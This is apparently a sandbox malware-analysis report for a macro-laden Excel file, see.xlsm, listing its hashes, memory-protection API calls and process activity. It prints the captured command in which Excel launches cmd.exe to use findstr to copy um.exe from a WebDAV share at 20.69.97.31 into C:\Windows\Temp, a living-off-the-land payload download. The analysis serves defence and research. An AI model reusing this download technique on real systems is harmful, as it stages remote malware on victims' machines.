popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

see.xlsm

VBA_macro
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 April 18, 2022, 9:13 a.m. April 18, 2022, 9:15 a.m.
Size 32.9KB
Type Microsoft Excel 2007+
MD5 7a300b49ef5af319c91821cf2674d2b9
SHA256 fc2eca27d4ceaf134867b988ec20a27d2b4e11f89539975e31ea37827de9a6fd
CRC32 E28D4B8D
ssdeep 768:oK7xynmgCNL0vzwZhGjk9DnQZQJoD88yIvsIRKzUotQZf2bbFO:o2xymLNVzMk98+ootSokww
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
20.69.97.31 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\test22\Documents>
console_handle: 0x00000007
1 1 0

WriteConsoleA

 buffer: FINDSTR: Cannot open \\20.69.97.31\webdav\um.exe
console_handle: 0x0000000b
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fcc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd1f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd1f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75291000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76451000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x735d1000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$see.xlsm
Time & API Arguments Status Return Repeated

NtCreateFile

 create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003a8
filepath: C:\Users\test22\AppData\Local\Temp\~$see.xlsm
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$see.xlsm
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline "C:\Windows\System32\cmd.exe" /S /KC:\Windows\System32\findstr.exe /V /L W3AllLov3LolBas \\20.69.97.31\webdav\um.exe > C:\Windows\Temp\um.exe && exit
host 20.69.97.31
com_class WScript.Shell May attempt to create new processes
parent_process excel.exe martian_process "C:\Windows\System32\cmd.exe" /S /KC:\Windows\System32\findstr.exe /V /L W3AllLov3LolBas \\20.69.97.31\webdav\um.exe > C:\Windows\Temp\um.exe && exit
dead_host 20.69.97.31:445
file C:\Windows\System32\cmd.exe
file C:\Windows\Temp\um.exe